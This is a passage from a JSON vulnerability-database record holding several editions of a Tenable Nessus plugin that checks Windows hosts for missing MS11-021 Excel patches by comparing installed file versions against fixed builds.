office_sp = get_kb_item(\"SMB/Office/2007/SP\");\n if (\n (!isnull(office_sp) && office_sp == 2) &&\n (\n (ver[0] == 12 && ver[1] == 0 && ver[2] < 6550) ||\n (ver[0] == 12 && ver[1] == 0 && ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2007' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2464583\");\n }\n # Excel 2003.\n office_sp = get_kb_item(\"SMB/Office/2003/SP\");\n if (\n (!isnull(office_sp) && office_sp == 3) &&\n (ver[0] == 11 && ver[1] == 0 && ver[2] < 8332)\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2003' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 11.0.8332.0\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2502786\");\n }\n # Excel 2002.\n if (\n (!isnull(office_sp) && office_sp == 3) &&\n (ver[0] == 10 && ver[1] == 0 && ver[2] < 6869)\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2002' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 10.0.6869.0\\n';\n\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466169\");\n }\n }\n}\n\n# Excel Viewer.\ninstalls = get_kb_list(\"SMB/Office/ExcelViewer/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/ExcelViewer/' - '/ProductPath';\n path = installs[install];\n path = 'n/a';\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Excel Viewer.\n if (\n ver[0] == 12 && ver[1] == 0 &&\n (\n ver[2] < 6550 ||\n (ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel Viewer' +\n '\\n File : '+ path +\n '\\n Installed version : '+ version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466158\");\n break;\n }\n }\n}\n\n\n# 2007 Microsoft Office system and the Microsoft Office Compatibility Pack.\ninstalls = get_kb_list(\"SMB/Office/ExcelCnv/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/ExcelCnv/' - '/ProductPath';\n path = installs[install];\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # 2007 Office system and the Office Compatibility Pack.\n if (\n ver[0] == 12 && ver[1] == 0 &&\n (\n ver[2] < 6550 ||\n (ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : 2007 Office system and the Office Compatibility Pack' +\n '\\n File : '+ path +\n '\\n Installed version : '+ version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466156\");\n break;\n }\n }\n}\n\nif (vuln)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "title": "MS11-021: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:23:16"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-0097", "CVE-2011-0979", "CVE-2011-0105", "CVE-2011-0098", "CVE-2011-0978", "CVE-2011-0103", "CVE-2011-0101", "CVE-2011-0104", "CVE-2011-0980"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote Windows host is running a version of Microsoft Excel or Excel Viewer that is affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a specially crafted Excel file, they could leverage this issue to execute arbitrary code subject to the user's privileges.", "edition": 2, "enchantments": {}, "hash": "ec12738cc47ea3d0d2410cfeeec1fad783969183ed87adb60fea09820c916a8e", "hashmap": [{"hash": "15bc6dc844e4b9ecee34f343b0fae75b", "key": "published"}, {"hash": "c873ceb88c2733918d5085d12ea543fb", "key": "pluginID"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "01e60114ce7d9a878cc02ee9dca9a3ef", "key": "description"}, {"hash": "8fe7795fca489b4a41cbd4de490e37d5", "key": "title"}, {"hash": "b677765cf0e8a9219ef3a21e6d3758c2", "key": "references"}, {"hash": "3f29908c6bb6f5efaf3e67cda47b94f7", "key": "modified"}, {"hash": "c9898bc973bfffca5119f1a3bfa73a8d", "key": "naslFamily"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "b709e0f08ca288caf319c6a45dcf7524", "key": "sourceData"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "faedb438011c10b2b3ac9682e0ad6e9a", "key": "cvelist"}, {"hash": "35f671787437d7463153fdc04e473d41", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=53378", "id": "SMB_NT_MS11-021.NASL", "lastseen": "2016-12-10T05:33:38", "modified": "2016-12-09T00:00:00", "naslFamily": "Windows : Microsoft Bulletins", "objectVersion": "1.2", "pluginID": "53378", "published": "2011-04-13T00:00:00", "references": ["https://technet.microsoft.com/library/security/MS11-021"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53378);\n script_version(\"$Revision: 1.24 $\");\n script_cvs_date(\"$Date: 2016/12/09 21:04:53 $\");\n\n script_cve_id(\n \"CVE-2011-0097\",\n \"CVE-2011-0098\",\n \"CVE-2011-0101\",\n \"CVE-2011-0103\",\n \"CVE-2011-0104\",\n \"CVE-2011-0105\",\n \"CVE-2011-0978\",\n \"CVE-2011-0979\",\n \"CVE-2011-0980\"\n );\n script_bugtraq_id(46225, 46226, 46229, 47201, 47235, 47243, 47244, 47245, 47256);\n script_osvdb_id(\n 70811,\n 70812,\n 70904,\n 71758,\n 71759,\n 71760,\n 71761,\n 71765,\n 71766\n );\n script_xref(name:\"EDB-ID\", value:\"18067\");\n script_xref(name:\"EDB-ID\", value:\"18087\");\n script_xref(name:\"MSFT\", value:\"MS11-021\");\n\n script_name(english:\"MS11-021: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)\");\n script_summary(english:\"Checks version of Excel\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"Arbitrary code can be executed on the remote host through Microsoft\nExcel.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Windows host is running a version of Microsoft Excel or\nExcel Viewer that is affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a\nspecially crafted Excel file, they could leverage this issue to\nexecute arbitrary code subject to the user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://technet.microsoft.com/library/security/MS11-021\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for Office XP, 2003, 2007,\n2010, Excel Viewer, and Office Compatability Pack.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/02/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:excel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:excel_viewer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office_compatibility_pack\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_nt_ms02-031.nasl\", \"office_installed.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\n\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS11-021';\nkbs = make_list(\"2464583\", \"2466146\", \"2466156\", \"2466158\", \"2466169\", \"2502786\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\ninfo = \"\";\n\n\n# Excel.\nvuln = 0;\ninstalls = get_kb_list(\"SMB/Office/Excel/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/Excel/' - '/ProductPath';\n path = installs[install];\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Excel 2010.\n office_sp = get_kb_item(\"SMB/Office/2010/SP\");\n if (\n (!isnull(office_sp) && office_sp == 0) &&\n (\n (ver[0] == 14 && ver[1] == 0 && ver[2] < 5130) ||\n (ver[0] == 14 && ver[1] == 0 && ver[2] == 5130 && ver[3] < 5003)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2010' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 14.0.5130.5003\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:'2466146');\n }\n # Excel 2007.\n office_sp = get_kb_item(\"SMB/Office/2007/SP\");\n if (\n (!isnull(office_sp) && office_sp == 2) &&\n (\n (ver[0] == 12 && ver[1] == 0 && ver[2] < 6550) ||\n (ver[0] == 12 && ver[1] == 0 && ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2007' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2464583\");\n }\n # Excel 2003.\n office_sp = get_kb_item(\"SMB/Office/2003/SP\");\n if (\n (!isnull(office_sp) && office_sp == 3) &&\n (ver[0] == 11 && ver[1] == 0 && ver[2] < 8332)\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2003' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 11.0.8332.0\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2502786\");\n }\n # Excel 2002.\n if (\n (!isnull(office_sp) && office_sp == 3) &&\n (ver[0] == 10 && ver[1] == 0 && ver[2] < 6869)\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2002' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 10.0.6869.0\\n';\n\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466169\");\n }\n }\n}\n\n# Excel Viewer.\ninstalls = get_kb_list(\"SMB/Office/ExcelViewer/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/ExcelViewer/' - '/ProductPath';\n path = installs[install];\n path = 'n/a';\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Excel Viewer.\n if (\n ver[0] == 12 && ver[1] == 0 &&\n (\n ver[2] < 6550 ||\n (ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel Viewer' +\n '\\n File : '+ path +\n '\\n Installed version : '+ version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466158\");\n break;\n }\n }\n}\n\n\n# 2007 Microsoft Office system and the Microsoft Office Compatibility Pack.\ninstalls = get_kb_list(\"SMB/Office/ExcelCnv/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/ExcelCnv/' - '/ProductPath';\n path = installs[install];\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # 2007 Office system and the Office Compatibility Pack.\n if (\n ver[0] == 12 && ver[1] == 0 &&\n (\n ver[2] < 6550 ||\n (ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : 2007 Office system and the Office Compatibility Pack' +\n '\\n File : '+ path +\n '\\n Installed version : '+ version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466156\");\n break;\n }\n }\n}\n\nif (vuln)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "title": "MS11-021: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)", "type": "nessus", "viewCount": 4}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2016-12-10T05:33:38"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:microsoft:excel_viewer", "cpe:/a:microsoft:office", "cpe:/a:microsoft:excel", "cpe:/a:microsoft:office_compatibility_pack"], "cvelist": ["CVE-2011-0097", "CVE-2011-0979", "CVE-2011-0105", "CVE-2011-0098", "CVE-2011-0978", "CVE-2011-0103", "CVE-2011-0101", "CVE-2011-0104", "CVE-2011-0980"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote Windows host is running a version of Microsoft Excel or Excel Viewer that is affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a specially crafted Excel file, they could leverage this issue to execute arbitrary code subject to the user's privileges.", "edition": 10, "enchantments": {"dependencies": {"modified": "2019-02-21T01:14:45", "references": [{"idList": ["CVE-2011-0097", "CVE-2011-0979", "CVE-2011-0105", "CVE-2011-0098", "CVE-2011-0978", "CVE-2011-0103", "CVE-2011-0101", "CVE-2011-0104", "CVE-2011-0980"], "type": "cve"}, {"idList": ["SMNTC-47235", "SMNTC-47244", "SMNTC-47245"], "type": "symantec"}, {"idList": ["ZDI-11-120", "ZDI-11-042", "ZDI-11-040", "ZDI-11-121", "ZDI-11-041"], "type": "zdi"}, {"idList": ["MACOSX_MS_OFFICE_APR2011.NASL"], "type": "nessus"}, {"idList": ["OPENVAS:1361412562310902410", "OPENVAS:1361412562310801597", "OPENVAS:801595", "OPENVAS:902410", "OPENVAS:801597", "OPENVAS:1361412562310801595"], "type": "openvas"}, {"idList": ["SSV:72308", "SSV:20473", "SSV:20502", "SSV:20482", "SSV:20487", "SSV:20484", "SSV:20507", "SSV:20486"], "type": "seebug"}, {"idList": ["PACKETSTORM:106665", "PACKETSTORM:100978"], "type": "packetstorm"}, {"idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/MS11_021_XLB_BOF"], "type": "metasploit"}, {"idList": ["SECURITYVULNS:VULN:11580", "SECURITYVULNS:DOC:26108", "SECURITYVULNS:DOC:26146", "SECURITYVULNS:DOC:26111", "SECURITYVULNS:DOC:26115"], "type": "securityvulns"}, {"idList": ["EDB-ID:17227", "EDB-ID:35573", "EDB-ID:18087"], "type": "exploitdb"}, {"idList": ["SAINT:7B206168EE040415028D1ACACF7854DD", "SAINT:8FDD1727EA3EF9E282DFCB5EB73BAB71", "SAINT:013CEB50A5B7225D03F444037190A7BC", "SAINT:AD5D5006868071901513DB0CC581B4BC", "SAINT:CBF7317F9C70B260229D429B6501B612", "SAINT:267E40AEADBF5F2FFB79C86829E9CD8F"], "type": "saint"}]}, "score": {"modified": "2019-02-21T01:14:45", "value": 10.0, "vector": "NONE"}}, "hash": "8cedc30d4529f377adcec5ce56183d0d0f3185f6dc0a9d8d1c9859e08a0ae6cf", "hashmap": [{"hash": "15bc6dc844e4b9ecee34f343b0fae75b", "key": "published"}, {"hash": "c873ceb88c2733918d5085d12ea543fb", "key": "pluginID"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "01e60114ce7d9a878cc02ee9dca9a3ef", "key": "description"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "8fe7795fca489b4a41cbd4de490e37d5", "key": "title"}, {"hash": "84cda5fc850fc23ca8b34a300dcb0086", "key": "cpe"}, {"hash": "c9898bc973bfffca5119f1a3bfa73a8d", "key": "naslFamily"}, {"hash": "c634e415711c2c395379a3376b7cb08e", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "faedb438011c10b2b3ac9682e0ad6e9a", "key": "cvelist"}, {"hash": "35f671787437d7463153fdc04e473d41", "key": "href"}, {"hash": "7f1e40a1c2c26f9b1d7fb1fd6a4ba40b", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=53378", "id": "SMB_NT_MS11-021.NASL", "lastseen": "2019-02-21T01:14:45", "modified": "2018-11-15T00:00:00", "naslFamily": "Windows : Microsoft Bulletins", "objectVersion": "1.3", "pluginID": "53378", "published": "2011-04-13T00:00:00", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/ms11-021"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53378);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\n \"CVE-2011-0097\",\n \"CVE-2011-0098\",\n \"CVE-2011-0101\",\n \"CVE-2011-0103\",\n \"CVE-2011-0104\",\n \"CVE-2011-0105\",\n \"CVE-2011-0978\",\n \"CVE-2011-0979\",\n \"CVE-2011-0980\"\n );\n script_bugtraq_id(46225, 46226, 46229, 47201, 47235, 47243, 47244, 47245, 47256);\n script_xref(name:\"EDB-ID\", value:\"18067\");\n script_xref(name:\"EDB-ID\", value:\"18087\");\n script_xref(name:\"MSFT\", value:\"MS11-021\");\n script_xref(name:\"MSKB\", value:\"2464583\");\n script_xref(name:\"MSKB\", value:\"2466146\");\n script_xref(name:\"MSKB\", value:\"2466156\");\n script_xref(name:\"MSKB\", value:\"2466158\");\n script_xref(name:\"MSKB\", value:\"2466169\");\n script_xref(name:\"MSKB\", value:\"2502786\");\n\n script_name(english:\"MS11-021: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)\");\n script_summary(english:\"Checks version of Excel\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"Arbitrary code can be executed on the remote host through Microsoft\nExcel.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Windows host is running a version of Microsoft Excel or\nExcel Viewer that is affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a\nspecially crafted Excel file, they could leverage this issue to\nexecute arbitrary code subject to the user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/ms11-021\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for Office XP, 2003, 2007,\n2010, Excel Viewer, and Office Compatability Pack.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/02/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:excel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:excel_viewer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office_compatibility_pack\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_nt_ms02-031.nasl\", \"office_installed.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\n\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS11-021';\nkbs = make_list(\"2464583\", \"2466146\", \"2466156\", \"2466158\", \"2466169\", \"2502786\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\ninfo = \"\";\n\n\n# Excel.\nvuln = 0;\ninstalls = get_kb_list(\"SMB/Office/Excel/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/Excel/' - '/ProductPath';\n path = installs[install];\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Excel 2010.\n office_sp = get_kb_item(\"SMB/Office/2010/SP\");\n if (\n (!isnull(office_sp) && office_sp == 0) &&\n (\n (ver[0] == 14 && ver[1] == 0 && ver[2] < 5130) ||\n (ver[0] == 14 && ver[1] == 0 && ver[2] == 5130 && ver[3] < 5003)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2010' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 14.0.5130.5003\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:'2466146');\n }\n # Excel 2007.\n office_sp = get_kb_item(\"SMB/Office/2007/SP\");\n if (\n (!isnull(office_sp) && office_sp == 2) &&\n (\n (ver[0] == 12 && ver[1] == 0 && ver[2] < 6550) ||\n (ver[0] == 12 && ver[1] == 0 && ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2007' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2464583\");\n }\n # Excel 2003.\n office_sp = get_kb_item(\"SMB/Office/2003/SP\");\n if (\n (!isnull(office_sp) && office_sp == 3) &&\n (ver[0] == 11 && ver[1] == 0 && ver[2] < 8332)\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2003' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 11.0.8332.0\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2502786\");\n }\n # Excel 2002.\n if (\n (!isnull(office_sp) && office_sp == 3) &&\n (ver[0] == 10 && ver[1] == 0 && ver[2] < 6869)\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2002' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 10.0.6869.0\\n';\n\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466169\");\n }\n }\n}\n\n# Excel Viewer.\ninstalls = get_kb_list(\"SMB/Office/ExcelViewer/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/ExcelViewer/' - '/ProductPath';\n path = installs[install];\n path = 'n/a';\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Excel Viewer.\n if (\n ver[0] == 12 && ver[1] == 0 &&\n (\n ver[2] < 6550 ||\n (ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel Viewer' +\n '\\n File : '+ path +\n '\\n Installed version : '+ version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466158\");\n break;\n }\n }\n}\n\n\n# 2007 Microsoft Office system and the Microsoft Office Compatibility Pack.\ninstalls = get_kb_list(\"SMB/Office/ExcelCnv/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/ExcelCnv/' - '/ProductPath';\n path = installs[install];\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # 2007 Office system and the Office Compatibility Pack.\n if (\n ver[0] == 12 && ver[1] == 0 &&\n (\n ver[2] < 6550 ||\n (ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : 2007 Office system and the Office Compatibility Pack' +\n '\\n File : '+ path +\n '\\n Installed version : '+ version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466156\");\n break;\n }\n }\n}\n\nif (vuln)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "title": "MS11-021: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)", "type": "nessus", "viewCount": 8}, "differentElements": ["cvss", "description", "reporter", "modified", "href"], "edition": 10, "lastseen": "2019-02-21T01:14:45"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:microsoft:excel_viewer", "cpe:/a:microsoft:office", "cpe:/a:microsoft:excel", "cpe:/a:microsoft:office_compatibility_pack"], "cvelist": ["CVE-2011-0097", "CVE-2011-0979", "CVE-2011-0105", "CVE-2011-0098", "CVE-2011-0978", "CVE-2011-0103", "CVE-2011-0101", "CVE-2011-0104", "CVE-2011-0980"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote Windows host is running a version of Microsoft Excel or Excel Viewer that is affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a specially crafted Excel file, they could leverage this issue to execute arbitrary code subject to the user's privileges.", "edition": 7, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "hash": "7ec518a66108874c3193640f0766a80384b0d06ca2434e0a0595c4b704d87466", "hashmap": [{"hash": "15bc6dc844e4b9ecee34f343b0fae75b", "key": "published"}, {"hash": "c873ceb88c2733918d5085d12ea543fb", "key": "pluginID"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "3b33040e1ee70c0673ab567f99a67d3f", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "01e60114ce7d9a878cc02ee9dca9a3ef", "key": "description"}, {"hash": "8fe7795fca489b4a41cbd4de490e37d5", "key": "title"}, {"hash": "b677765cf0e8a9219ef3a21e6d3758c2", "key": "references"}, {"hash": "84cda5fc850fc23ca8b34a300dcb0086", "key": "cpe"}, {"hash": "c9898bc973bfffca5119f1a3bfa73a8d", "key": "naslFamily"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "faedb438011c10b2b3ac9682e0ad6e9a", "key": "cvelist"}, 